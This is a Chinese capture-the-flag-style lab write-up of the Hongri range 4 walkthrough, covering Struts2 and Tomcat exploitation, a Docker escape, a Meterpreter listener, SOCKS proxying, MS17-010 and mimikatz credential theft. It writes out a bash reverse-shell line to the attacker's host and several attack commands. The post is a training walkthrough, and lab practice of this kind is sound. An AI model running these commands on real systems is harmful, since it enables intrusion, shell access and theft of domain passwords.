红队打靶,红日靶场系列,红日靶场4

news2024/12/29 11:29:03

文章目录

  • 环境搭建:
  • 外网渗透:
    • Struts2
    • phpmyadmin
    • tomcat
  • 内网渗透
    • msf上线
    • 建立代理
    • 内网信息收集
    • 密码获取
    • 总结


环境搭建:

在这里插入图片描述

攻击机:
真实机win10
kali : 192.168.0.128
靶机:
web:192.168.183.130, 192.168.0.129
dc: 192.168.183.129
win7:192.168.183.128
启动docker环境,输入sudo后提示输入密码,输入ubuntu即可

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

外网渗透:

先用RG来个端口扫描,探测到几个端口和三个服务,phpmyadmin,tomcat,struts2
在这里插入图片描述

Struts2

访问2001端口可以看到个struts2的文件上传页面,直接上工具扫一下看看是否存在漏洞,发现一大堆

在这里插入图片描述
点击执行命令,查询系统进程的cgroup信息,看看目标是否是docker环境
在这里插入图片描述
很明显目标由docker搭建,看看是否可以进行docker逃逸
在kali中开启一个监听
在这里插入图片描述

在struts2内执行反弹shell的命令 bash -i &>/dev/tcp/192.168.0.128/8888 <&1
在这里插入图片描述
kali成功接收shell
在这里插入图片描述
docker逃逸
这里出不去,看下个端口

参考这篇文章:https://xz.aliyun.com/t/12495

phpmyadmin

phpmyadmin提权可以参考红日1

https://editor.csdn.net/md/?articleId=131577749

tomcat

扫一下,发现存在一个CVE-2017-12615具体可以一下这篇文章:tomcat系列漏洞复现
在这里插入图片描述
使用put方法写入一个webshell
在这里插入图片描述
冰蝎连接
在这里插入图片描述
命令执行,发现可以挂载光盘
在这里插入图片描述
将真实机挂在到docker里面

mkdir /test
mount /dev/sda1 /test
cd /test
ls -al

可以看到真实机的一些东西
在这里插入图片描述
执行下面命令可以看到所有用户的密码信息

cat /etc/passwd
cat /etc/shadow

这里可以在相同版本的ubuntu中进行创建用户密码,覆盖现有的密码,之后进行ssh连接,看不到密码信息的用哥斯拉连接
在这里插入图片描述
连接ssh后进行提权
在这里插入图片描述
root 下面添加一个当前登录的用户,权限写成和root一样
在这里插入图片描述
权限变成了root
在这里插入图片描述

内网渗透

msf上线

拿到主机权限之后发现有两块网卡,183网段使用kali无法通信,肯定为内网地址
在这里插入图片描述
使用kali生成后门,并用xshell上传到ubuntu
在这里插入图片描述
并赋予执行权限
在这里插入图片描述
打开msf,配置、监听、执行

use exploit/multi/handler  #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost 192.168.0.128 #kaili 的ip
set lport 4444 #木马的端口
run #执行

上线成功
在这里插入图片描述

建立代理

在msf里添加路由

run post/multi/manage/autoroute

在这里插入图片描述
这里用到一款工具,建立代理的话比较方便

https://github.com/idlefire/ew

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

在这里插入图片描述

在目标主机上上传ew_for_linux64,执行命令

./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

在这里插入图片描述
创建成功
在这里插入图片描述
用kali ping一下内网,看看代理是否创建成功
在这里插入图片描述

内网信息收集

可以看到kali成功打入内网,使用msf模块进行内网主机探测

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 15
run

发现两台主机
在这里插入图片描述
在这里插入图片描述
使用nmap扫一下,发现445端口都开着,试一下ms17010
在这里插入图片描述
你妹的,坑死了,这里利用ms17010攻击的时候要把火绒退了,不然会拦截,这里成功拿下win7
在这里插入图片描述
server的话可以攻击成功,但是创建不了会话
解决Kali中MSF Console拿到Windows shell后显示中文乱码问题,在拿到的Windows shell中输入如下命令,设置活动代码页字符为UTF-8编码。

chcp 65001

在这里插入图片描述

密码获取

提权:使用meterpreter里面使用令牌窃取SYSTEM权限之后再进行mimikatz密码进行抓取

use incognito
impersonate_token "NT AUTHORITY\SYSTEM"

在这里插入图片描述
成功获取win7在域里的明文密码
在这里插入图片描述
在这里插入图片描述

总结

有些过程思路很清晰,但是做起来各种问题,总结:还是带练
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/745599.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【图像处理】Python判断一张图像是否亮度过低

比如&#xff1a; 直方图&#xff1a; 代码&#xff1a; 这段代码是一个用于判断图像亮度是否过暗的函数is_dark&#xff0c;并对输入的图像进行可视化直方图展示。 首先&#xff0c;通过import语句导入了cv2和matplotlib.pyplot模块&#xff0c;用于图像处理和可视化。 …

新版studio没法筛选Error

目录 方式一 简单粗暴&#xff0c;针对怀旧者&#xff0c;可切回原版log视图 方式二 学习新的log过滤方法 升级新版本AndroidStudio后&#xff0c;log日志变成以下样子&#xff0c;发现之前过滤error,infor的tab都不见了&#xff0c;瞬间不淡定了&#xff0c;查阅资料才发现…

运维小知识(一)——centos系统安装(小白入门级)

目录 1.制作系统U盘 2.安装centos系统 3.系统配置 3.1【语言】配置​编辑 3.2【软件选择】配置 3.3【安装位置】配置 3.4【主机名、root密码、网络】配置 1.制作系统U盘 首先下载软件ventoy&#xff0c;制作系统U盘&#xff0c;买个新U盘。先在笔记本电脑安装ventoy软件&a…

MongoDB安装使用

部分转载于&#xff1a;MongoDB安装配置教程&#xff08;详细版&#xff09; 文章目录 1. mongodb server安装使用2. mongodb客户端连数据库背景 1. mongodb server安装使用 前言&#xff1a;MongoDB是前端开发人员普遍使用的数据库&#xff0c;因为MongoDB不需要图形界面&…

YiOVE书源:不只是书源,还有对书源的一些预处理,比如提前查看书源数量,以及包含哪些小说站

引言 我是一个小说爱好者&#xff0c;阅读APP更是其中的效果斐然的不错宝器&#xff0c;平时自己也会收集一些书源。但是在这过程中产生了一些需求&#xff0c;比如&#xff1a;书源的数目是多少&#xff1f;书源链接还有效吗&#xff1f; 于是&#xff0c;自己基于Flask写了…

推荐这7个交互软件,交互效果更丰富

在现代Web设计中&#xff0c;交互效果是吸引用户注意力、增强用户体验的关键因素之一。通过使用交互效果软件&#xff0c;设计师可以为网站和应用程序增加动态元素和交互特性&#xff0c;提供更具吸引力和互动性的用户体验。本文将介绍7个操作简单&#xff0c;交互效果丰富的交…

【运维工程师学习四续集】Web服务之Linux配置安装Nginx

【运维工程师学习四续集】Web服务之Linux配置安装Nginx 0、查看是否安装wget1、安装wget2、下载 Nginx 安装包wget下载nginx安装包 3、解压nginx tar包4、安装相关依赖文件解释 5、切换到nginx目录6、配置当前nginx7、编译安装nginx8、切换到nginx的sbin目录9、查看nginx的版本…

RabbitMQ集群搭建与高可用实现(未完待续)

文章目录 一、RabbitMQ集群概述1、为什么要使用RabbitMQ集群2、RabbitMQ如何支持集群3、RabbitMQ的节点类型 二、普通集群1、什么是普通集群2、Docker搭建普通集群模式&#xff08;1&#xff09;安装docker&#xff08;2&#xff09;安装RabbitMQ&#xff08;3&#xff09;检验…

线程任务异步回调

1、需要掌握概念 //同步&#xff0c;异步&#xff0c;异步回调 //MQ消息中间件 例子&#xff1a;工作邮件、微信、QQ 原理&#xff1a; 同步、异步、异步回调 2、代码 public static void main(String[] args) throws Exception {//同步&#xff0c;异步&#xff0c;异步…

X2000 Linux 测试VL53L4CD

在X2000 Linux 调试VL53L4CD驱动章节中已从官方下载了驱动文件&#xff0c;文件如下&#xff1a; 一、 拷贝测试代码 将user拷贝到sdk\demo下&#xff0c;如下所示&#xff1a; 2、修改Makefile 修改\user\test\Makefile指令CC为mips-linux-gnu-gcc CC : mips-linux-gnu-gcc…

北约峰会遭遇RomCom黑客组织攻击

昨天&#xff08;7月11日&#xff09;&#xff0c;微软正式披露了一个未修补的零日安全漏洞&#xff0c;该漏洞存在于多个Windows和Office产品中&#xff0c;可以通过恶意Office文档远程执行代码。 未经身份验证的攻击者可在无用户交互的情况下利用该漏洞(跟踪为CVE-2023-3688…

IMU背包对动物行为影响测试

动物行为是一种可观察和可测量的指标&#xff0c;轻量化和低成本的传感器技术的先进发展为研究人员提供了以最小干预来跨越空间和时间跟踪动物的机会。特别是对于家禽业来说&#xff0c;已经从传统的笼养系统转变为无笼养系统。许多技术可用于检测大群鸡的行为、活动和位置。为…

哈希的应用->布隆过滤器

为什么用布隆过滤器 这个是基于位图的一个超级牛皮的一个数据结构。举个例子&#xff0c;假设我们创建Steam账号&#xff0c;我们的账户名字是不允许重复的&#xff0c;所以我们需要找到一个没有人使用过的名字&#xff0c;但是我们得知道现在这个名字是否有人用过&#xff0c…

VMware ESXi 7.0 U3n macOS Unlocker OEM BIOS 集成网卡驱动和 NVMe 驱动 (集成驱动版)

VMware ESXi 7.0 U3n macOS Unlocker & OEM BIOS 集成网卡驱动和 NVMe 驱动 (集成驱动版) ESXi 7 U3 标准版集成 Intel 网卡、USB 网卡 和 NVMe 驱动 请访问原文链接&#xff1a;https://sysin.org/blog/vmware-esxi-7-u3-sysin/&#xff0c;查看最新版。原创作品&#x…

利用Docker部署程序

目录 一、安装Docker程序 二、安装MySQL 三、安装MongoDB 四、安装Redis 五、安装RabbitMQ 六、部署人脸识别程序 一、部署工作流项目 二、打包Java项目 三、部署Java项目 一、安装Docker程序 这节课我们要利用Docker环境部署很多东西&#xff0c;有数据库、人脸识别程…

冯诺依曼结构和操作系统的理解

在正式讲解进程之前&#xff0c;需要先铺垫一些基本知识. 目录 冯诺依曼结构 操作系统 冯诺依曼结构 这个名词相信大家非常熟悉&#xff0c;我们常见的计算机&#xff0c;如笔记本。我们不常见的计算机&#xff0c;如服务器&#xff0c;大部分都遵守冯诺依曼体系。 这张图…

Tomcat工作原理

一、Tomcat架构 ### 说明&#xff1a; Server&#xff1a;表示整个 Tomcat Catalina servlet 容器&#xff0c;Server 中可以有多个 Service。&#xff08;可以通过telenet 8005后连接后输入“SHUTDOWN” 注意这里是大写&#xff0c;来关闭服务&#xff09;Service&#xff1…

宠物用品小程序怎么做

宠物用品小程序功能介绍&#xff1a; 1. 商品管理&#xff1a; 宠物用品小程序提供了商品管理功能&#xff0c;商家可以方便地添加、编辑和删除商品信息。用户可以浏览并选择合适的宠物用品&#xff0c;如食品、玩具、服饰等。 2. 订单管理&#xff1a; 用户可以在宠物用品…

区块链服务网络BSN季度版本迭代说明【2023年Q2】

根据区块链服务网络发展联盟计划安排&#xff0c;BSN将每周进行一个小的版本迭代&#xff0c;每季度进行一个大的版本迭代&#xff0c;目前区块链服务网络&#xff08;BSN&#xff09;已完成最新季度版本迭代。 我们将按照BSN官方专网&#xff08;国内版和国际版&#xff09;、…

手把手教你从零开始集成声网音视频功能(iOS版)

说明 1.环信音视频和声网音视频 是两个不同的系统&#xff0c;所以如果要切换的话&#xff0c;需要集成声网的sdk&#xff0c;环信音视频的sdk可以直接废弃 2.文章会介绍如何用声网的音视频跑通demo&#xff0c;可以了解整个音视频通话的流程&#xff0c; 3.文章会介绍已经集…